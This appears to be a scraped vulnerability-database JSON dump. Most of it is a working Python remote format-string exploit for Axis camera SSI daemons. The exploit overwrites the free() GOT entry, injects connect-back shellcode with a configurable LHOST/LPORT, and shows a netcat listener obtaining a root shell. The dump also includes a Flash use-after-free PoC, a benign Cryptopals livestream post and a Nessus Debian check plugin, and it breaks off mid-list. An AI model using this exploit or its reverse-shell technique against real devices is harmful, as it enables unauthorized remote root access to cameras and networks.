\r\n # Calculate FirstWhat value\r\n FirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)\r\n \r\n # Calculate SecondWhat value, so it always is 0x203[00] or [01]\r\n SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB\r\n \r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"LHOST\",lhost)\r\n shell = shell.replace(\"LPORT\",lport)\r\n \r\n GOTint = GOTint - len(shell)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n \r\n else:\r\n print \"[!] NCSH missing, exiting\"\r\n sys.exit(1)\r\n#\r\n# Let's start the exploiting procedure\r\n#\r\n \r\n#\r\n# Stage one\r\n#\r\n if NCSH1 or NCSH2:\r\n \r\n # \"New Style\" needs to make the exploit in two stages\r\n if NCSH2:\r\n FMScode = do_FMS(rhost,verbose)\r\n # Writing 'FirstWhere' and 'SecondWhere'\r\n # 1st request\r\n FMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n #\r\n # 1st and 2nd \"Write-Where\"\r\n FMScode.AddDirectParameterN(POP1) # Write 1st Where\r\n FMScode.Add(\"XX\") # Jump up two bytes for next address\r\n FMScode.AddDirectParameterN(POP2) # Write 2nd Where\r\n FMSdata = FMScode.FMSbuild()\r\n else:\r\n FMSdata = \"\"\r\n \r\n print \"[>] StG_1: Preparing netcat connect back shell to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n else:\r\n print \"[>] StG_1: Sending and decoding shellcode to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n \r\n # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM\r\n # Actually, any valid and public readable .shtml file will work...\r\n # (One of the two below seems always to be usable)\r\n #\r\n # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two\r\n # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url\r\n #\r\n try:\r\n target_url = \"/httpDisabled.shtml?user_agent=\"\r\n if noexploit:\r\n target_url2 = target_url\r\n else:\r\n target_url2 = \"/httpDisabled.shtml?&http_user=\"\r\n \r\n if NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n except urllib2.HTTPError as e:\r\n if e.code == 404:\r\n print \"[<] Error\",e.code,e.reason\r\n target_url = \"/view/viewer_index.shtml?user_agent=\"\r\n if noexploit:\r\n target_url2 = target_url\r\n else:\r\n target_url2 = \"/view/viewer_index.shtml?&http_user=\"\r\n print \"[>] Using alternative target shtml\"\r\n if NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n except Exception as e:\r\n if not NCSH2:\r\n print \"[!] Shellcode delivery failed:\",str(e)\r\n sys.exit(1)\r\n#\r\n# Stage two\r\n#\r\n \r\n#\r\n# Building and sending the FMS code to the target\r\n#\r\n print \"[i] Building the FMS code...\"\r\n \r\n FMScode = do_FMS(rhost,verbose)\r\n \r\n # This is an 'One-Write-Where-And-What' for FMS\r\n #\r\n # Stack Example:\r\n #\r\n # Stack content | Stack address (ASLR)\r\n #\r\n # 0x0 | @0x7e818dbc -> [POP1's]\r\n # 0x0 | @0x7e818dc0 -> [free () GOT address]\r\n # 0x7e818dd0 | @0x7e818dc4>>>>>+ \"Write-Where\" (%n)\r\n # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's]\r\n # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address]\r\n # 0x76f55ab8 | @0x7e818dd0<<<<<+ \"Write-What\" (%n)\r\n # 0x1 | @0x7e818dd4\r\n #\r\n if not NCSH1 and not NCSH2:\r\n FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's \r\n FMScode.AddADDR(GOTint) # GOT Address\r\n FMScode.AddWRITEn(1) # 4 bytes Write-Where\r\n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n \r\n FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's\r\n FMScode.AddADDR(BSSint) # BSS shellcode address\r\n FMScode.AddWRITEn(1) # 4 bytes Write-What\r\n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n \r\n # End of 'One-Write-Where-And-What'\r\n \r\n \r\n # This is an 'Two-Write-Where-And-What' for FMS\r\n #\r\n # Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd=\"xxx\" -->\r\n # We jump over all SSI tagging to end up directly where \"xxx\" will\r\n # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())\r\n #\r\n # The Trick here is to write lower target address, that we will jump to when calling free(),\r\n # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT\r\n # address with two LSB writes.\r\n #\r\n elif NCSH2:\r\n #\r\n # Direct parameter access for FMS exploitation are really nice and easy to use.\r\n # However, we need to exploit in two stages with two requests.\r\n # (I was trying to avoid this \"Two-Stages\" so much as possibly in this exploit developement...)\r\n #\r\n # 1. Write \"Two-Write-Where\", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)\r\n # 2. Write with \"Two-Write-What\", where 1st (LSB) and 2nd (MSB) \"Write-Where\" pointing to.\r\n # \r\n # With \"new style\", we can write with POPs independently as we don't depended of same criteria as in \"NCSH1\",\r\n # we can use any regular \"Stack-to-Stack\" pointer as we can freely choose the POP-and-Write.\r\n # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]\r\n #\r\n # Stack Example:\r\n #\r\n # Stack content | Stack address (ASLR)\r\n #\r\n # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st \"Write-Where\" [@Stage One]\r\n # 0x76f41fb8 | @0x7e818dc8 |\r\n # 0x76f3d70c | @0x7e818dcc |\r\n # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st \"Write-What\" [@Stage Two]\r\n # 0x1 | @0x7e818dd4\r\n # [....]\r\n # 0x1c154 | @0x7e818e10\r\n # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd \"Write-Where\" [@Stage One]\r\n # 0x76f41fb8 | @0x7e818e18 |\r\n # 0x76f3d70c | @0x7e818e1c |\r\n # 0x76f55758 | @0x7e818e20<<<<<+ 2nd \"Write-What\" [@Stage Two]\r\n # 0x1 | @0x7e818e24\r\n #\r\n \r\n FMScode.Add(shell)\r\n \r\n #\r\n # 1st and 2nd \"Write-Where\" already done in stage one\r\n #\r\n # 1st and 2nd \"Write-What\"\r\n #\r\n FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB)\r\n FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n \r\n elif NCSH1:\r\n # Could use direct argument addressing here, but I like to keep \"old style\" as well,\r\n # as it's another interesting concept.\r\n #\r\n # Two matching stack contents -> stack address in row w/o or max two POP's between,\r\n # is needed to write two bytes higher (MSB).\r\n # \r\n #\r\n # Stack Example:\r\n #\r\n # Stack Content | @Stack Address (ASLR)\r\n #\r\n # 0x9c | @7ef2fde8 -> [POP1's]\r\n # [....]\r\n # 0x1 | @7ef2fdec -> [GOTint address]\r\n #------\r\n # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]\r\n # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)\r\n # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]\r\n # ------ | |\r\n # [....] -> [POP3's] | |\r\n # 0x7fb99dc | @7ef2fe7c | |\r\n # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX]\r\n # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))\r\n # -> [POP4's] |\r\n # (nil) | @7ef2fe88 | [Count up to 0x20300]\r\n # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)\r\n \r\n FMScode.Add(shell)\r\n \r\n # Write FirstWhere for 'FirstWhat'\r\n FMScode.AddPOP(POP1)\r\n FMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n FMScode.AddWRITEn(1)\r\n \r\n # Write SecondWhere for 'SecondWhat'\r\n #\r\n # This is special POP with 1 byte, we can maximum POP 2!\r\n #\r\n # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement\r\n # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.\r\n # Kept as reference as we now using direct parameter access AKA 'New Style\" for 5.2x/5.4x\r\n #\r\n if POP2 != 0:\r\n # We only want to write 'SecondWhat' two bytes higher at free() GOT\r\n if POP2 > 2:\r\n print \"POP2 can't be greater than two!\"\r\n sys.exit(1)\r\n if POP2 == 1:\r\n FMScode.Add(\"%2c\")\r\n else:\r\n FMScode.Add(\"%1c%1c\")\r\n else:\r\n FMScode.Add(\"XX\")\r\n FMScode.AddWRITEn(1)\r\n \r\n # Write FirstWhat pointed by FirstWhere\r\n FMScode.AddPOP(POP3) # Old Style POP's\r\n FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)\r\n \r\n # Write SecondWhat pointed by SecondWhere\r\n FMScode.AddPOP(POP4) # Old Style POP's\r\n FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n \r\n else:\r\n sys.exit(1)\r\n \r\n FMSdata = FMScode.FMSbuild()\r\n \r\n print \"[>] StG_2: Writing shellcode address to free() GOT address:\",'0x{:08x}'.format(GOThex),\"(%d bytes)\" % (len(FMSdata))\r\n \r\n # FMS comes here, and calculations start after '=' in the url\r\n try:\r\n if NCSH1 or NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode\r\n except urllib2.HTTPError as e:\r\n print \"[!] Payload delivery failed:\",str(e)\r\n sys.exit(1)\r\n except Exception as e:\r\n # 1st string returned by HTTP mode, 2nd by HTTPS mode\r\n if str(e) == \"timed out\" or str(e) == \"('The read operation timed out',)\":\r\n print \"[i] Timeout! Payload delivered sucessfully!\"\r\n else:\r\n print \"[!] Payload delivery failed:\",str(e)\r\n sys.exit(1)\r\n \r\n if noexploit:\r\n print \"\\n[*] Not exploiting, no shell...\\n\"\r\n else:\r\n print \"\\n[*] All done, enjoy the shell...\\n\"\r\n \r\n#\r\n# [EOF]\r\n#\n\n# 0day.today [2018-03-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25439"}, {"lastseen": "2018-04-04T21:32:20", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2015-12-18T00:00:00", "published": "2015-12-18T00:00:00", "id": "1337DAY-ID-25730", "href": "https://0day.today/exploit/description/25730", "type": "zdt", "title": "Adobe Flash TextField.type Setter - Use-After-Free", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=577\r\n \r\nThere is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:\r\n \r\nvar mc = this.createEmptyMovieClip(\"mc\", 101);\r\nvar tf = mc.createTextField(\"tf\", 102, 1, 1, 100, 100);\r\ntf.type = {toString : func};\r\n \r\nfunction func(){\r\n \r\n mc.removeMovieClip();\r\n \r\n // Fix heap here\r\n \r\n return \"input\";\r\n \r\n }\r\n \r\nA sample swf and fla are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39052.zip\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25730"}], "filippoio": [{"lastseen": "2019-02-08T03:14:39", "bulletinFamily": "blog", "description": "_tl;dr: I'm livecoding the [Cryptopals](<https://cryptopals.com>) in Go [on Twitch](<https://www.twitch.tv/filosottile>), one set every Sunday. The recordings are [on YouTube](<https://www.youtube.com/FilippoValsorda>)._\n\n> Oh, wow. I love the idea. Would anyone here seriously watch 20 to 40 hours of me doing crypto, math and Go? Mic, screen, and everything. <https://t.co/jx3s736bGm>\n> \n> -- Filippo Valsorda (@FiloSottile) [October 16, 2016](<https://twitter.com/FiloSottile/status/787777267313303553?ref_src=twsrc%5Etfw>)\n\nAlmost a year after promising to, I recently started live-coding in Go solutions to the [Cryptopals Crypto Challenges](<https://cryptopals.com>) [on Twitch](<https://www.twitch.tv/filosottile>).\n\nThis is an experiment, as I've never live-streamed before. I'm planning to solve one set per week, ramping up in difficulty, until Set 8 which will be a proper speed-run. Set 1 [aired on October 1st](<https://www.youtube.com/watch?v=eE_Tz6udUQU>) and Set 2 [will air on October 15th](<https://www.twitch.tv/events/iONlet0-QxmvBnbEHIEcYg>) (tomorrow!) at 2pm ET / 11am PT / 7pm BST.\n\nFor context the Cryptopals, once known as the _Matasano Crypto Challenges_, are an extraordinary set of exercises that have you build and break cryptosystems with attacks that did and do apply to real world implementations. I personally owe a lot to them, as they made me discover I liked building and breaking crypto, revealed that what I had was in fact a marketable skill, and for almost a year sat at the top of my CV.\n\nI remember the thrill of playing them early on when unlocking each set required mailing the solutions to the previous one, and the satisfaction in [being the first to complete Set 7](<https://news.ycombinator.com/item?id=12720838>) in a 30 hours run while at [Recurse Center](<https://recurse.com>) in Fall 2013. It feels only right to redo them now that I'm attending a new batch of Recurse. I really look forward to Set 8, which I haven't played yet.\n\nThe recordings will be [on YouTube](<https://www.youtube.com/FilippoValsorda>) and the code [on GitHub](<https://github.com/FiloSottile/mostly-harmless/tree/master/cryptopals>). Below you can see the recording of the first set. Instead of donations, I hope to raise money for the [Internet Archive](<https://archive.org/donate>), in particular with the Set 8 speed-run; receipts can be sent to the gmail address `filippo.donations` to be tracked and thanked on-stream on a honour basis.\n\nTo track when I go on air you can:\n\n * [follow my channel on Twitch](<https://www.twitch.tv/filosottile>);\n * [subscribe on YouTube](<https://www.youtube.com/FilippoValsorda>);\n * or [follow me on Twitter](<https://twitter.com/FiloSottile>).\n\nFinally, if anyone wants to join me in solving them (maybe in other languages), I'd love to build a team and I'd be happy to cross-host them on my channel.", "modified": "2017-10-14T19:48:05", "published": "2017-10-14T19:48:05", "id": "FILIPPOIO:1DCC788DBFF435A0281AB28FAD627F7F", "href": "https://blog.filippo.io/live-streaming-cryptopals/", "type": "filippoio", "title": "Live streaming Cryptopals", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-02-21T01:28:55", "bulletinFamily": "scanner", "description": "The previous security updates for python-crypto (DLA-773-1, DLA-773-2 & DLA-773-3) were not available on non-amd64 architectures.\n\nThis was due to the testsuite failing to exit gracefully when 'multiprocessing' based tests were not functioning or available, such as on the Debian buildd network.\n\nFor Debian 7 'Wheezy', this issue has been fixed in python-crypto version 2.6-4+deb7u7. There has been no change to the codepath associated with the original CVE (2013-7459).\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2017-01-11T00:00:00", "id": "DEBIAN_DLA-773.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96189", "published": "2017-01-03T00:00:00", "title": "Debian DLA-773-4 : python-crypto update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-773-4. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96189);\n script_version(\"$Revision: 3.4 $\");\n script_cvs_date(\"$Date: 2017/01/11 14:52:36 $\");\n\n script_name(english:\"Debian DLA-773-4 : python-crypto update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The previous security updates for python-crypto (DLA-773-1, DLA-773-2\n& DLA-773-3) were not available on non-amd64 architectures.\n\nThis was due to the testsuite failing to exit gracefully when\n'multiprocessing' based tests were not functioning or available, such\nas on the Debian buildd network.\n\nFor Debian 7 'Wheezy', this issue has been fixed in python-crypto\nversion 2.6-4+deb7u7. There has been no change to the codepath\nassociated with the original CVE (2013-7459).\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/01/msg00010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/python-crypto\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-crypto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-crypto-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-crypto-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3-crypto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python3-crypto-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"python-crypto\", reference:\"2.6-4+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-crypto-dbg\", reference:\"2.6-4+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-crypto-doc\", reference:\"2.6-4+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3-crypto\", reference:\"2.6-4+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python3-crypto-dbg\", reference:\"2.6-4+deb7u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-07-20T01:12:18", "bulletinFamily": "exploit", "description": "Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit. Remote exploit for Multiple platform", "modified": "2016-07-19T00:00:00", "published": "2016-07-19T00:00:00", "id": "EDB-ID:40125", "href": "https://www.exploit-db.com/exploits/40125/", "type": "exploitdb", "title": "Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit", "sourceData": "#!/usr/bin/env python2.7\r\n# \r\n# [SOF]\r\n#\r\n# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon\r\n# Research and development by bashis <mcw noemail eu> 2016\r\n#\r\n# This format string vulnerability has following characteristic:\r\n# - Heap Based (Exploiting string located on the heap)\r\n# - Blind Attack (No output the remote attacker)(*)\r\n# - Remotly exploitable (As anonymous, no credentials needed)\r\n#\r\n# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.\r\n#\r\n# This exploit has following characteristic:\r\n# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]\r\n# - Modifying LHOST/LPORT in shellcode on the fly\r\n# - Manual exploiting of remote targets\r\n# - Simple HTTPS support\r\n# - Basic Authorization support (not needed for this exploit)\r\n# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode\r\n# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)\r\n# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root\r\n# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)\r\n# - Multiple FMS exploit techniques\r\n# - \"One-Write-Where-And-What\" for MIPS and CRISv32\r\n# Using \"Old Style\" POP's\r\n# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call\r\n# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.\r\n# - \"Two-Write-Where-And-What\" for ARM\r\n# 1) \"Old Style\": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address\r\n# 2) \"New Style\": ARM Arch's have both \"Old Style\" (>5.50.x) )POPs and \"New Style\" (<5.40.x) direct parameter access for POP/Write\r\n# [Big differnce in possibilities between \"Old Style\" and \"New Style\", pretty interesting actually]\r\n# - Another way to POP with \"Old Style\", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)\r\n# - Exploit is quite well documented\r\n#\r\n# Anyhow,\r\n# Everything started from this simple remote request:\r\n#\r\n# ---\r\n# $ echo -en \"GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\\n\\n\" | netcat 192.168.0.90 80\r\n# HTTP/1.1 500 Server Error\r\n# Content-Type: text/html; charset=ISO-8859-1\r\n#\r\n# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>\r\n# <BODY><H1>500 Server Error</H1>\r\n# The server encountered an internal error and could not complete your request.\r\n# </BODY></HTML>\r\n# ---\r\n#\r\n# Which gave this output in /var/log/messages on the remote device:\r\n#\r\n# ---\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.\r\n# ---\r\n#\r\n# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products\r\n#\r\n# ---\r\n# $ netcat -vvlp 31337\r\n# listening on [any] 31337 ...\r\n# 192.168.0.90: inverse host lookup failed: Unknown host\r\n# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)\r\n# pwd\r\n# /usr/html\r\n# ---\r\n#\r\n# Some technical notes:\r\n#\r\n# 1. Direct addressing with %<argument>$%n is \"delayed\", and comes in force only after disconnect.\r\n# Old metod with POP's coming into force instantly\r\n#\r\n# 2. Argument \"0\" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)\r\n# - Would be interesting to investigate why.\r\n#\r\n# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26\r\n# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff\r\n#\r\n# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff\r\n# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f\r\n#\r\n# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:\r\n# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)\r\n#\r\n# 4. Everything is randomized, except heap.\r\n#\r\n# 5. My initial attempts to use ROP's was not good, as I didn't want to create\r\n# one unique FMS key by testing each single firmware version, and using ROP with FMS\r\n# on heap seems pretty complicated as there is one jump availible, maximum two.\r\n#\r\n# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.\r\n# \r\n# 6. Encoded and Decoded shellcode located in .bss section.\r\n# 6.1 FMS excecuted on heap\r\n#\r\n# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM\r\n# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,\r\n# so execute shellcode on heap/stack may be impossible.\r\n# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,\r\n# and re-compile of the image.\r\n# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.\r\n#\r\n# 8. This exploit are pretty well documented, more details can be extracted by reading\r\n# the code and comments.\r\n#\r\n# MIPS ssid maps\r\n# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid\r\n# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid\r\n# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]\r\n#\r\n# ARM ssid maps\r\n# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid\r\n# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid\r\n# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]\r\n#\r\n# Crisv32 ssid maps\r\n# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid\r\n# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid\r\n# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]\r\n#\r\n# General notes:\r\n#\r\n# When the vul daemon process is exploited, and after popping root connect-back shell,\r\n# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,\r\n# when the main process are fully alive again, I can enjoy the shell, and everybody else can\r\n# enjoy of the camera - that should make all of us happy ;)\r\n# During exploiting, logs says almost nothing, only that the main process restarted.\r\n# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)\r\n#\r\n# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),\r\n# after ssid cannot verify the user, free() are the closest function to be called after\r\n# vsyslog(), needed and perfect to use for jumping.\r\n# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.\r\n# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.\r\n#\r\n# Quite surprised to see so many different devices and under one major release version,\r\n# that's covered by one \"FMS key\". The \"FMS key\" are valid for all minor versions under the major version.\r\n#\r\n# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, \r\n# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. \r\n#\r\n# - No hardcoded login/password that could easily be found in firmware/software files. \r\n# - Extremely hard to find without local access (and find out what to trigger for opening the door)\r\n# - Nobody can not actually prove it is a sophisticated door for sure. \"It's just another bug.. sorry! - here is the fixed version.\"\r\n# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)\r\n#\r\n# Note:\r\n# I don't say that Axis Communication has made this hidden format string by this purpose.\r\n# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, \r\n# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().\r\n#\r\n# Vulnerable and exploitable products\r\n#\r\n# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,\r\n# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,\r\n# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,\r\n# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,\r\n# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,\r\n# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, 